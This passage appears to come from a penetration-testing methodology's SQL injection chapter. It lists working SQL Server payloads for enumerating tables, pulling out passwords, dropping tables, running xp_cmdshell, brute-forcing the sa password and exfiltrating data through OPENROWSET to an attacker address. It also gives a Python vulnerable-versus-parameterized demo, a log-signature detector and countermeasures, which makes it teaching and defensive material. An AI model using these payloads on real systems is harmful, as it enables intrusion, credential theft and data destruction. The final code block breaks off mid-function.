Note that this defeats only that particular payload: the username is still concatenated into the command text, so a value that closes the quote and starts a second statement (xyz'; ... --) is still executed by the batch. The robust fix is to pass the username as a bound parameter (an ADO Command object with Parameters) rather than concatenating it.
Q.10 GET CONTROL OVER DATABASE
Description
Using SQL injection an attacker can insert or update values in a table. Before that, the attacker has to obtain information about the table, such as the table name, the column names and other details.
Expected Result
To get the table name, column names and column types, which the attacker will use for inserting, reading and modifying table records.
Step-by-step explanation
Q.10.1 Getting the Name of the Table (Using the HAVING Clause)
To obtain the name of the table used in the query, or at least one of its fields, an attacker enters 'having 1=1-- in the username/password form. The query becomes:
select * from authentication where name = ''having 1=1--' and password = ''having 1=1--'
When the query is executed, the ODBC driver returns the following error message from SQL Server:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Column 'authentication.slno' is invalid in the select list because it is not contained in either an aggregate function and there is no GROUP BY clause.
/verify.asp, line 24
From this interesting message an attacker gets the name of the table (authentication) and of a column (slno), which will be extremely useful for the later enumeration.
Q.10.2 Getting all Columns of the Table (Using the GROUP BY Clause)
With the information obtained above, and using HAVING together with GROUP BY, an attacker can list the rest of the columns of the targeted table:
' group by authentication.slno having 1=1--
As expected, the SQL statement on the server side will look like this:
select * from authentication where name = '' group by authentication.slno having 1=1--
Once the query is processed, the ODBC driver returns an error message naming a newly enumerated field:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Column 'authentication.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/verify.asp, line 24
The error is generated because, with GROUP BY, every column in the select list must appear in the GROUP BY clause or inside an aggregate. By applying GROUP BY repeatedly, each time adding the newly found column, an attacker obtains the names of all the columns of the table.
Q.10.3 Determining the Number of Columns (Using the UNION Clause)
To check whether all the columns have been found, the attacker just needs to use a UNION clause, giving the following input in the text box:
Xyz' union select slno,name from authentication; --
On submitting this value, the query on the server becomes something like:
select * from authentication where name = 'Xyz' union select slno, name from authentication; --
When SQL Server tries to parse this query it generates the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/verify1.asp, line 24
What does this error mean?
The server is telling us that slno and name are not the only columns in the table, as the UNION clause does not match the number of columns returned by select *. This means the attacker has to use the GROUP BY clause again to find the hidden columns. When all the columns are included in the query, no error is generated, which is the indication that the attacker has all the columns of the table.
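The following is an added example, not ISSAF's own code, covering Q.8, Q.9 and Q.10.3 together against an in-memory SQLite copy of the Authentication table. verify_vulnerable builds the query the way the text describes verify.asp doing it, by concatenating the input into the SQL string; verify_parameterized is the fix. SQLite's error text differs from SQL Server's and the Python binding refuses stacked statements, so the INSERT and UPDATE steps of Q.10.6 and Q.10.7 are not reproduced here, but the special-character probe, the authentication bypass and the UNION column-count technique behave the same. The table contents are constructed.

```python
"""Added example (not ISSAF's own code) covering Q.8, Q.9 and Q.10.3 against an
in-memory SQLite copy of the Authentication table.  `verify_vulnerable` builds
the query the way the text describes verify.asp doing it; `verify_parameterized`
is the fix.  Table contents are constructed."""
import sqlite3

SPECIAL_CHARS = ["'", ";", ",", "''", "%", "-", "*"]


def make_db():
    """Constructed Injection.Authentication table (slno, name, password)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table authentication (slno integer, name char(20), password char(20))")
    db.executemany("insert into authentication values (?, ?, ?)",
                   [(1, "Xyz", "Abc"), (2, "Mylogin", "Secret1")])
    return db


def verify_vulnerable(db, name, password):
    """verify.asp as described: user input concatenated into the SQL string.
    Returns ("ok", rows_matched) or ("error", message)."""
    sql = ("select * from authentication where name = '%s' and password = '%s'"
           % (name, password))
    try:
        return ("ok", len(db.execute(sql).fetchall()))
    except sqlite3.Error as e:
        return ("error", str(e))


def verify_parameterized(db, name, password):
    """The fix: the input is bound as a value and can never become SQL."""
    rows = db.execute("select * from authentication where name = ? and password = ?",
                      (name, password)).fetchall()
    return ("ok", len(rows))


def probe(db, verify=verify_vulnerable):
    """Q.8: which of the special characters make the database choke?"""
    return {ch: verify(db, ch, "x")[0] for ch in SPECIAL_CHARS}


def bypass(db, verify=verify_vulnerable, payload="' or 1=1--"):
    """Q.9: true when the payload alone logs in (at least one row matched)."""
    status, n = verify(db, payload, "")
    return status == "ok" and n > 0


def count_columns(db, max_cols=16):
    """Q.10.3 generalised: widen UNION SELECT 1,1,... until the column-count
    error stops; that width is the number of columns behind SELECT *."""
    for n in range(1, max_cols + 1):
        payload = "Xyz' union select %s--" % ",".join(["1"] * n)
        if verify_vulnerable(db, payload, "")[0] == "ok":
            return n
    return None


if __name__ == "__main__":
    db = make_db()
    print(probe(db))                                     # only the single quote errors
    print(bypass(db), bypass(db, verify_parameterized))  # True False
    print(count_columns(db))                             # 3
```

The column-count loop is the general form of the page's manual step: instead of guessing column names, it only needs a constant per column and stops at the first width the database accepts, which is also the width an attacker needs for the UNION-based data extraction in the following steps.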
Q.10.4 Finding Data Types (Using Aggregate Functions)
At this stage the attacker has the table name and all the columns of the table. But to insert values into the table or update a column value, he needs to know the data type of the columns. To find out the data type of a column he enters:
Xyz' union select sum(field_name) from authentication--      (in the username text box)
When this value is submitted, the query on the server becomes:
select * from authentication where name = 'Xyz' union select sum(field_name) from authentication--
Here field_name is a column of the table in use. When SQL Server tries to execute this query it generates the following error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server] The sum or average aggregate operation cannot take a char data type as an argument.
/verify.asp, line 24
This error message tells us that the name field of the table is of a character (VARCHAR) type. If the field had been of a NUMERIC type, sum() would have succeeded and the ODBC error would instead have been the UNION column-count mismatch:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server] All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/verify.asp, line 24
By proceeding in the same manner and applying aggregate functions to the rest of the columns we can get the data types of all the columns.
Note:
Another way to get type information is to use the system tables SYSOBJECTS and SYSCOLUMNS (MS SQL Server only) to enumerate the columns in a neat way. The injected statement looks like this:
Ups' union select b.name,1,1 from sysobjects a, syscolumns b where a.id=b.id and a.name='table_name' and b.colorder = 48 --
And its result:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server] Syntax error converting the nvarchar value 'field_name' to a column of data type int.
/Login.asp, line 85
Why do we need all columns and data types?
Since some columns do not accept NULL values, we have to specify a value for those columns, otherwise it will not be possible to insert rows into the table. To achieve this we need all column names and data types.
Q.10.5
Getting Username & Password from table:
Aggregate functions can be used to determine some values in any table in the database.
Since attackers are interested in usernames & passwords, they likely to read the
usernames from the user table, like this:
‘ union select min(name), 1,1 from authentication where username > ‘a’-- (In the
username text box)
Page 783 of 1123
When this value is submitted to the server, it will become:
select * from authentication where name =’’ union select min (name), 1,1 from
authentication where username > ‘a’; -When the above query is executed, its first statement (before “union” clause) returns
null value and Second returns minimum username that is greater than ‘a’, while
attempting to convert it to an integer, produces error:
Microsoft OLE DB provider for ODBC driver error ‘80040e07’
[Microsoft][ODBC SQL server driver][SQL server] syntax error converting the varchar
value ‘Xyz’ to a column of data type int.
/verify.asp, line 25
So the attacker now knows that the username ‘Xyz’ exists in the table. He can now
iterate through the rows in the table by substituting each new username, he discovered
into where clause:
‘union select min(name), 1,1 from authentication where username > ‘Xyz’-- (In the
username text box)
Again when ODBC tries to convert character value in the integer, it generates an error:
Microsoft OLE DB provider for ODBC driver error ‘80040e07’
[Microsoft][ODBC SQL server driver][SQL server] syntax error converting the varchar
value ‘Mylogin’ to a column of data type int.
/verify.asp, line 25
From this error the attacker has obtained one more username that exists in the table. Using the same trick, he can obtain every username in the table. Once the attacker has the usernames, he can gather the passwords (in the username text box):
' union select password, 1,1 from authentication where name ='Xyz'--
Again ODBC tries to convert the character value (the password) to an integer and generates the following error message:
Microsoft OLE DB provider for ODBC driver error '80040e07'
[Microsoft] [ODBC SQL Server Driver] [SQL Server] syntax error converting the character value 'Abc' to a column of a data type Int.
From the above error the attacker learns that "Abc" is the password of user "Xyz".
A more elegant way to display all usernames and passwords is to concatenate them into a single string and then attempt to convert that string to an integer. This technique is documented later in this same section, under the title "Displaying desired Information from the table in the Browser".
Q.10.6
Inserting Values in the Table:
As the attacker already has all the necessary information (table name, column names, data types of the columns), he can easily insert data into the table using an insert statement. The attacker just needs to enter:
' insert into authentication (name, password) values ('xyz','xyz')--
When this value is submitted to the server, the query becomes:
select * from authentication where name = '' insert into authentication (name, password) values ('xyz','xyz')--
Here the select query returns nothing, so it is effectively ignored, and the insert query executes successfully.
Q.10.7
Updating Values of the Table:
To update values in the table, the attacker can follow the same procedure as for insert. To update the value of a column, say the password of a user, the attacker just has to inject the following statement in the username text box:
' update authentication set password = 'Xyz' where name ='mylogin'--
When this value is submitted, the query at the server becomes:
select * from authentication where name ='' update authentication set password = 'mylogin' where username = 'Xyz'--
So the attacker has successfully changed the password of user "Xyz" without knowing his old password.
Q.10.8
Deleting Entire Data from the Table: (using Delete or Drop statement)
An attacker can make our life much more difficult by destroying the data of an entire table with a Delete or Drop statement. He just has to enter a simple statement in the username text box:
'; drop table authentication--
or
Xyz' delete from authentication--
When this statement is submitted to the server, the query becomes:
select * from authentication where name = ''; drop table authentication--
or
select * from authentication where name = 'Xyz' delete from authentication--
This query results in the loss of all the data stored in the authentication table.
Q.10.9
Displaying desired Information from the table in the Browser
How to get the username and password was already described above. It is discussed here in more detail in order to obtain all fields of the table. An attacker can use a stored procedure, a PL/SQL block or a Transact-SQL block to display the entire contents of one or more columns in the browser itself. The procedure has three steps:
1st STEP - Generation of Auxiliary Table
The idea behind the first step is to use the SQL INTO clause to generate a table on the fly, saving the extracted data into a single record (which is more convenient for later display) that can be exported afterwards.
The attacker therefore creates a temporary table (on the server) containing data extracted from the main table (on the server). The temporary table contains only one column, and that column holds the values from the different columns of the main table concatenated into a string.
Let's see how an SQL string injected in Transact-SQL (Microsoft SQL Server) achieves this effect:
'declare @col varchar(8000) set @col='' select @col=@col+name+'/'+password+';' from authentication where slno>@col select @col as col into temp_table--
This script, written in Transact-SQL, concatenates all usernames and passwords into a single string and stores it in a temporary table. In the same way, a PL/SQL block could be built in Oracle for the same purpose:
Xyz' begin declare @col varchar (2000)
Set @col=':'
Select @col = @col +name+'/'+password from authentication;
Select @col as col into temp_table;
End; --
Note:
temp_table is the temporary table name. col is the name of the column of the temporary table temp_table. @col is the variable of the script.
2nd Step - Browsing the auxiliary table
In the second step, the attacker wants to display the data from the temporary table he created in the previous step. To do this, he builds and injects a SELECT against the temporary table, using the union technique described at the beginning of this section:
Zxy' union select col,1,1 from temp_table--
After submitting the above text in the username text box, the SQL query at the server side becomes:
select * from authentication where name = '' union select col,1,1 from temp_table--
The first column of authentication is numeric and the column in temp_table is character type, so when ODBC tries to match the two columns it generates an error that displays all the data from temp_table in the browser:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'Xyz/abc;MyLogin/xyz;Abc/xyz to a column of a data type Integer.
3rd Step - Deletion of auxiliary table
Once the desired data has been obtained, the attacker deletes the temporary table by injecting the DROP command, as in the following example:
';drop table temp_table--
Q.11 GET CONTROL ON HOST
Description
Once the attacker has gained control of the database, they are likely to use that access to gain further control.
Expected Results
An attacker can achieve this by using the following:
• @@variables of SQL Server.
• The xp_cmdshell extended procedure to run commands on the server.
• The xp_regread extended procedure to read the registry keys of the server.
• The xp_regwrite extended procedure to edit the registry of the server.
• The xp_servicecontrol extended procedure.
• Other extended procedures to influence the server functions.
• The bulk insert statement to read a file on the server.
Step-by-step explanation
Q.11.1
Getting Server Name
The server name can be determined by using SQL Server built-in functions in SQL queries.
Eg: ' union select @@servername,1,1--
select @@servername returns the server name, and when it is compared with the first column of the authentication table (which is numeric) ODBC generates an error and the server name is printed in the browser:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 3) ' to a column of data type int.
Q.11.2
Executing Commands on the Server
An attacker can use the SQL Server built-in extended procedure xp_cmdshell to run operating system commands on the server. Here are some examples of how an attacker can exploit your system:
Statement | Purpose
' xp_cmdshell 'dir' | Get the listing of existing directories/files on the server
' xp_cmdshell 'net user' | Get the listing of all users on the machine
' xp_cmdshell 'del boot.ini' | Delete any system file
' xp_cmdshell 'net share nombre=drive:path' | Share a resource
' xp_cmdshell 'net user username password' | Add a user
Q.11.3
Shutting Down the SQL Server:
An attacker can even shut down the SQL Server if privileges are not managed properly, by submitting the following statement in the username text box:
';SHUTDOWN--
When this value is submitted to the server, the SQL query becomes:
select * from authentication where name = ''; SHUTDOWN--
As ';' is the command separator in SQL Server, after executing the select statement it executes the SHUTDOWN statement, which stops the SQL Server; any further request sent to the server will fail.
Q.11.4
Brute Force to Find Password of SQL Server:
If the attacker has access to an account that can issue the OPENROWSET command, they can attempt to re-authenticate with SQL Server, effectively allowing them to guess passwords. There are several variants of the OPENROWSET syntax. The most useful forms are:
Using MSDASQL:
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;uid=sa;pwd=sa','select @@version')
Using SQLOLEDB:
select * from OPENROWSET('SQLOLEDB','';'sa';'sa','select @@version')
By default everyone can execute xp_execresultset, which leads to the following elaboration on the previous two methods:
Using MSDASQL:
exec xp_execresultset N'select * from OPENROWSET(''MSDASQL'',''DRIVER={SQL Server};SERVER=;uid=sa;pwd=foo'',''select @@version'')', N'master'
Using SQLOLEDB:
exec xp_execresultset N'select * from OPENROWSET(''SQLOLEDB'','''';''sa'';''foo'',''select @@version'')', N'master'
By default, in SQL Server 2000, a low-privileged account cannot execute the MSDASQL variant of the above syntax, but it can execute the SQLOLEDB variant. Because OPENROWSET authentication is instant and imposes no timeout after an unsuccessful authentication attempt, it is possible to inject a script that brute forces the 'sa' password using the processing capabilities of the server itself.
Q.11.5
Retrieving data from SQL Injections:
The functions OPENROWSET and OPENDATASOURCE can be used to pull data to and from a remote database into a local database. OPENROWSET can be used with select, insert, update and delete statements on the external data source.
Note:
Performing data manipulation on the remote data source is not very common, and it is not always possible because it depends on the OLE DB provider. SQLOLEDB supports this feature.
Below is an example of how data can be directed to the remote data source:
insert into OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=sa','select * from table1') select * from table2
The above example appends all the data from the local table 'table2' to 'table1' of the remote database. Similarly, an attacker can redirect data from the remote database to its local database using the OPENROWSET function. For example:
insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=sa;network=abcd,1433;address=hackers_ip_address;','select * from table1') select * from table2
The above example first retrieves all the data from the remote data source 'table2' and then transfers it to the hacker's data source 'table1' situated at the given network address.
Note:
In order to push or pull data to and from the remote data source, the structure of the remote and local data source must be identical. Using the OPENROWSET command an attacker can get any desired information from the remote server, for example critical information from system tables such as sysobjects, syscolumns, sysdatabases, sysxlogins etc.
Q.11.6
Xp_regread and Xp_regwrite extended procedure:
An attacker can use extended procedures to read or change the registry contents: xp_regread to read the system registry and xp_regwrite to write to it. For example, to read the value "TestValue" from the key 'SOFTWARE\Test' of 'HKEY_LOCAL_MACHINE' into the variable @test, the attacker can use:
DECLARE @test varchar(20)
EXEC master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Test', @value_name='TestValue', @value=@test OUTPUT
SELECT @test
Some more examples are:
exec xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'NullSessionShares'
(This determines what null-session shares are available on the server.)
exec xp_regenumvalues 'HKEY_LOCAL_MACHINE', 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
(This reveals all of the SNMP communities configured on the server. With this information an attacker can probably reconfigure network appliances in the same area of the network, since SNMP communities tend to be changed infrequently and shared among many hosts.)
Syntax of xp_regwrite:
EXECUTE xp_regwrite [@rootkey =] 'rootkey', [@key =] 'key', [@value_name =] 'value_name', [@type =] 'type', [@value =] 'value'
For example, to write the string 'Test' to the value 'TestValue' under the key 'SOFTWARE\Test' of 'HKEY_LOCAL_MACHINE', an attacker can use:
EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Test', @value_name='TestValue', @type='REG_SZ', @value='Test'
Q.11.7
Xp_servicecontrol Extended Procedure:
The master..xp_servicecontrol extended procedure allows an attacker to start, stop and pause a service. For example:
exec master..xp_servicecontrol 'start','schedule'
Exec master..xp_servicecontrol 'star
Note:
There are many extended procedures available in MS SQL Server, but we are not going into the details of each and every one.
Q.11.8
Adding Extended Stored Procedures
An attacker can add custom extended procedures on the remote server. One way of doing this is to build a stored procedure DLL that carries malicious code and then upload that DLL to the server. There are several ways to get the DLL file onto the server; it is then registered with the sp_addextendedproc procedure. Here is an example of how a DLL is registered on the server:
sp_addextendedproc 'xp_myproc', 'c:\mydoc\xp_myproc.dll'
Once the DLL is loaded on the server the extended procedure can be used in the normal way. For example xp_myproc can be run as:
exec xp_myproc;
List of some other useful extended procedures
xp_availablemedia | Reveals the available drives on the machine.
xp_dirtree | Allows a directory tree to be obtained.
xp_enumdsn | Enumerates ODBC data sources on the server.
xp_loginconfig | Reveals information about the security mode of the server.
xp_makecab | Allows the user to create a compressed archive of files on the server.
xp_ntsec_enumdomains | Enumerates the domains that the server can access.
xp_terminate_process | Terminates a process, given its PID.
Bulk Insert Statement
Using the bulk insert statement it is possible to load a text file into a temporary table, so an attacker can read a file on the web server by first converting it into a database table and then using a union clause against that table.
The procedure is as follows. First create a table:
create table temp_table (col varchar(8000))
Then use the bulk insert statement to load data from the desired file into this table:
bulk insert temp_table from 'c:\inetpub\wwwroot\verify.asp'
After this statement executes, the table contains the code of the page verify.asp, and this code can be displayed in the browser using any of the error message techniques above, such as union. (This is very useful for obtaining the source code of scripts stored on the database server, or possibly the source code of ASP pages.)
BCP Statement
The BCP utility copies data between an instance of Microsoft SQL Server 2000 and a data file in a user-specified format. An attacker can therefore create a text file containing all the data of the desired table and, after storing that file in the web server's directory, access it from his web browser. Here is an example of how an attacker can read the data of our authentication table using the BCP command:
bcp "select * from authentication" queryout c:\inetpub\wwwroot\authentication_file.txt -S Pen-test -U sa -P Sa
Note:
-S specifies the server name.
-U specifies the user name.
-P specifies the password.
When this command is executed, the data from the authentication table is stored in the file "c:\inetpub\wwwroot\authentication_file.txt", and the attacker can access this file from his browser.
Using Time Delays as a Communication channel
Frequently an attacker is in the position of being able to execute a command on some system but unsure whether it ran correctly, because the system under attack returns no error messages. In such a scenario a time delay is a possible option.
For example, in SQL Server the command
waitfor delay '0:0:5'
will cause the query to pause for 5 seconds at that point.
This gives the attacker a means of communicating information from the database server to the browser. Since web applications wait for the query to complete before returning content to the browser, the attacker can use time delays to get yes/no answers to questions about the database and its environment.
• To check whether the application is connected to SQL Server as the 'sa' user, use:
if (select user) = 'sa' waitfor delay '0:0:5'
If the application takes more than five seconds to return, then we are connected to the database as the 'sa' user.
• To check whether the 'pubs' sample database exists:
if exists (select * from pubs..pub_info) waitfor delay '0:0:5'
• To check whether there are any rows in the table 'authentication':
if exists (select * from authentication) waitfor delay '0:0:5'
[If the application takes more than 5 seconds to return, that is the indication of successful command execution.]
Q.11.9
Linked Server
A linked server allows distributed, heterogeneous queries against OLE DB data sources. After creating a linked server with "sp_addlinkedserver", distributed queries can be executed through it. So using a linked server, an attacker gains the ability to query the remote servers. These links are stored in the "master..sysservers" table.
Executing SQL Queries using the OPENQUERY Function:
The OPENQUERY function accepts two parameters: the name of the linked server and the text of the query to pass. For example, this query returns the total sales grouped by customer gender:
select * from openquery(LINKED_OLAP, 'select [Customer Gender:Gender], sum([measures:unit sales]) from sales group by [Customer Gender:Gender]')
ActiveX Automation Scripts in SQL Server:
SQL Server provides several built-in extended procedures that allow users to create ActiveX automation scripts. These scripts are functionally the same as scripts written in VBScript or JScript: using them in SQL Server we can create objects and interact with them. Here is an example that creates an instance of notepad through the Windows Script Host shell object:
declare @obj int
exec sp_OACreate 'wscript.shell', @obj out
exec sp_OAMethod @obj, 'run', NULL, 'notepad.exe'
An attacker can create his own scripts to perform a desired task, such as reading the contents of a known file on the server.
Note:
Only members of the sysadmin fixed server role can execute sp_OACreate.
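As an added example (not part of the ISSAF text), the following Python script scans constructed IIS W3C log lines for the signatures of the Q.11 techniques above (xp_cmdshell, the xp_reg* procedures, WAITFOR DELAY probes, SHUTDOWN, OPENROWSET, BULK INSERT) and the union/drop payloads from Q.10, so an assessor can check web server logs for them. The log excerpt, the 10.0.0.x addresses and the rule labels are all constructed.

```python
"""
Added example, not part of the ISSAF text: a small detector that scans IIS W3C
extended log lines for the SQL Server injection signatures this section describes
(error-based UNION SELECT enumeration, xp_cmdshell and the xp_reg* procedures,
WAITFOR DELAY timing probes, SHUTDOWN, OPENROWSET/OPENDATASOURCE, BULK INSERT,
DROP TABLE / DELETE FROM). The log lines below are constructed samples.
"""
import re
from urllib.parse import unquote_plus

# Each rule is (label, compiled regex). Rules run against the URL-decoded,
# lower-cased query string, so '+' and %xx encoded payloads are caught as well.
RULES = [
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("xp_cmdshell", re.compile(r"\bxp_cmdshell\b")),
    ("registry-xp", re.compile(r"\bxp_reg(read|write|enumvalues)\b")),
    ("time-delay", re.compile(r"\bwaitfor\s+delay\b")),
    ("shutdown", re.compile(r";\s*shutdown\b")),
    ("openrowset", re.compile(r"\bopen(rowset|datasource|query)\s*\(")),
    ("bulk-insert", re.compile(r"\bbulk\s+insert\b")),
    ("drop-delete", re.compile(r"\b(drop\s+table|delete\s+from)\b")),
    # Trailing '--' is how every payload in this section discards the rest of
    # the original statement; on its own it is a weak signal, so it is reported
    # only alongside another rule (see classify()).
    ("comment-tail", re.compile(r"--\s*$")),
]

# Constructed IIS 5/6 style W3C log excerpt: three requests carry payloads from
# this section, two are benign. The 10.0.0.x addresses are placeholders.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-03-01 10:15:01 10.0.0.5 GET /verify.asp name=alice 200
2004-03-01 10:15:09 10.0.0.7 GET /verify.asp name=%27+union+select+min%28name%29%2C1%2C1+from+authentication+where+username+%3E+%27a%27-- 500
2004-03-01 10:16:22 10.0.0.7 GET /verify.asp name=%27%3Bexec+master..xp_cmdshell+%27dir%27-- 500
2004-03-01 10:17:45 10.0.0.9 GET /verify.asp name=%27%3Bif+%28select+user%29%3D%27sa%27+waitfor+delay+%270%3A0%3A5%27-- 200
2004-03-01 10:18:03 10.0.0.5 GET /default.asp - 200
"""


def parse_w3c(lines):
    """Yield one dict per log record; the '#Fields:' directive names the columns."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split(" ")
        if len(parts) != len(fields):
            continue  # malformed record: skip rather than abort the scan
        yield dict(zip(fields, parts))


def classify(query):
    """Return the rule labels that fire on one raw (still URL-encoded) query string."""
    if query in ("", "-"):  # IIS logs '-' when there is no query string
        return []
    decoded = unquote_plus(query).lower()
    labels = [label for label, rx in RULES if rx.search(decoded)]
    if labels == ["comment-tail"]:
        return []  # a lone trailing comment is not enough to flag the request
    return labels


def scan(lines):
    """Return (c-ip, cs-uri-stem, labels, sc-status) for every record that matches.

    sc-status is kept because, as this section shows, error-based injection
    surfaces as 500 responses, so a 500 on a flagged request is a stronger hit.
    """
    hits = []
    for rec in parse_w3c(lines):
        labels = classify(rec.get("cs-uri-query", "-"))
        if labels:
            hits.append((rec["c-ip"], rec["cs-uri-stem"], labels, rec["sc-status"]))
    return hits


if __name__ == "__main__":
    for ip, stem, labels, status in scan(SAMPLE_LOG.splitlines()):
        print(f"{ip} {stem} status={status} rules={','.join(labels)}")
```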
Q.12 MAP INTERNAL NETWORK
Q.13 RUN AUTOMATED SCANNER
In case you haven't found the SQL Injection vulnerability you can run the automated scanner. This can also be done after performing all the tests mentioned above, to cover other holes that may remain after manual assessment.
Q.14 TOOLS AND THEIR USES
Tools used to check SQL Injection vulnerability
1. Mieliekoek with HTTrack.
2. Web Sleuth.
3. Netcat
4. Achilles
5. Curl
Q.14.1
Mieliekoek
This tool helps detect sites vulnerable to SQL Injection. It does not check web sites online for the vulnerability but works on a copy of the website stored on the client itself. Before using this tool we have to use the HTTrack tool to download the complete web site to the client, so this tool works in conjunction with HTTrack.
How does mieliekoek work?
This tool (a Perl script) takes the output of a web mirroring tool as input. It inspects every file and determines whether there is a form in the file; if so it tries some form of SQL insertion (inserts blah' in all fields) and looks at the output - if it sees "ODBC" it marks the form as vulnerable.
Q.14.2
HTTRACK
How to use HTTrack?
HTTrack takes the following basic parameters:
1) Project name: any name for the project.
2) Web site address: address of the web site to download.
3) Destination directory: local directory where it stores the website.
Once the website is stored in our local directory, the mieliekoek tool can be used to check that web site for SQL Injection vulnerability. This tool is written in Perl and is used as follows:
$/> mieliekoek.pl <local directory name> <target site name>
The tool tries to enter the value of the variable "badstring" into the input fields of the site and then checks whether any ODBC error message is generated by that input. Only one input can be given in the "badstring" variable at a time, but different combinations can be tried by changing the value of "badstring" in the script and running it again.
I have tried this tool on a very small site '1' (which contains a form that is vulnerable to SQL Injection). But according to this tool there is no SQL injection vulnerability in this site. So I am not sure about the accuracy of this tool.
I got output something like:
finished...
7 files
3 forms
0 vulnerable forms
I tried the same tool again on a large site (I don't know whether the site is vulnerable to SQL injection or not) and got the following output:
Finished...
183 files
67 forms
0 vulnerable forms
I tried the same tool again on a big site 2 3 (I don't know whether the site is vulnerable to SQL injection or not) and got the following output:
Finished...
34 files
10 forms
0 vulnerable forms
Q.14.3
Web Sleuth
The Web Sleuth tool is a proxy that contains a plugin to check for SQL Injection. This plugin is not part of Web Sleuth by default, but it can be downloaded from the site http://www.sandsprite.com
There are two ways to test a site for SQL injection using Web Sleuth. The first is the "Test Inputs" option and the second is the "SQL Injection plugin". I have performed SQL injection using both ways, but I did not get a correct result from either of the above options. First I tried the SQL Injection tool, which required the SQL Server name and its password. I had given both inputs properly but it was generating some error. I also tried the other option; it ran successfully but it had not produced any report. In the report it was showing only the name of the site on which the test was performed, so I could not tell whether the site I was testing was vulnerable to SQL Injection or not.
Q.14.4
Netcat
Netcat is a beautiful tool that lets you read and write data through TCP or UDP connections. Its main advantage in relation to SQL Injection is for manual verification: the connection just has to be established and a text file prepared in advance, containing the POST with the indicated strings, piped into it. Because of its nature, Netcat reads and writes "pure" HTTP, which can sometimes be an advantage for detecting "things" that might not be seen with more specific tools.
Q.14.5
Achilles
Achilles is a proxy that lets you easily intercept and modify HTTP traffic "on the fly" while testing a web application. It is very useful in those cases where we need to log our "manual" testing actions. Although its basic version does not include any plugin for SQL Injection, it can be very helpful in web application testing in general and in SQL injection testing in particular.
Q.14.6
Curl
Just as described on its web site (http://curl.haxx.se): "Curl is a command line tool for transferring files with URL syntax, supporting FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE and LDAP. Curl supports HTTPS certificates, HTTP POST, HTTP PUT, FTP uploading, kerberos, HTTP form based upload, proxies, cookies, user+password authentication, file transfer resume, http proxy tunneling [...]"
There are circumstances in which good use of this tool saves a lot of working time. Although it takes some time to get used to it, its ability to establish secure connections (with OpenSSL) and its special options (custom FTP commands) are of great utility when testing SQL Injection situations on secure servers.
Just as an example, we could make a POST to our target site by executing a command similar to:
curl -d "user=MyUser&password=MyPass" http://target.com/auth.asp
Q.15 COUNTERMEASURE
• Validate input properly.
• Do not allow users to enter special symbols like ' ; -- " % * _ etc.
• Replace a single ' with a space, using the Replace function like:
Replace(Request.Form("name"), "'", " ")
• Or replace a single ' with '':
Replace(Request.Form("name"), "'", "''")
• If the input in question is numeric, use a numeric check function like IsNumeric() to verify that the input is numeric.
• Use stored procedures instead of writing queries directly in the recordset object.
• Give only the necessary privileges to the users.
• Drop unnecessary system procedures, so that nobody can use them maliciously.
Guidelines for Coding
• Use strongly typed parameters, if possible in combination with stored procedures, to pass queries into the database.
• Use application-only logins rather than the 'sa' or 'dbo' account.
• Grant only EXECUTE access to the necessary stored procedures.
• Separate utilities should have separate access.
• Remove or disable any unnecessary extended stored procedures.
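As an added example (not part of the ISSAF text), the following Python code puts the concatenated login lookup that every injection in this section abuses beside the quote-doubling Replace() advice and the strongly typed parameter advice from the list above, and applies the numeric check to an integer field. sqlite3 stands in for SQL Server so it runs offline; the authentication table and its rows are constructed.

```python
"""
Added example, not part of the ISSAF text: the login lookup that every injection
in this section abuses (select * from authentication where name = '<input>'),
written with string concatenation, with the quote-doubling Replace() advice above,
and with a bound parameter. sqlite3 stands in for SQL Server so it runs offline;
the authentication table and its three rows are constructed sample data.
"""
import sqlite3

# Payload from this section (Q.10.5): the union returns the smallest username
# and the trailing -- discards the closing quote of the original statement.
PAYLOAD = "' union select min(name), 1, 1 from authentication where name > 'a'--"


def make_db():
    """Build the (slno, name, password) table the section's examples assume."""
    con = sqlite3.connect(":memory:")
    con.execute("create table authentication (slno integer, name text, password text)")
    con.executemany("insert into authentication values (?, ?, ?)",
                    [(1, "xyz", "abc"), (2, "mylogin", "xyz"), (3, "abc", "xyz")])
    con.commit()
    return con


def lookup_concat(con, name):
    """Vulnerable form: the user value is spliced into the SQL text, so quotes,
    union clauses and comments inside it become part of the statement."""
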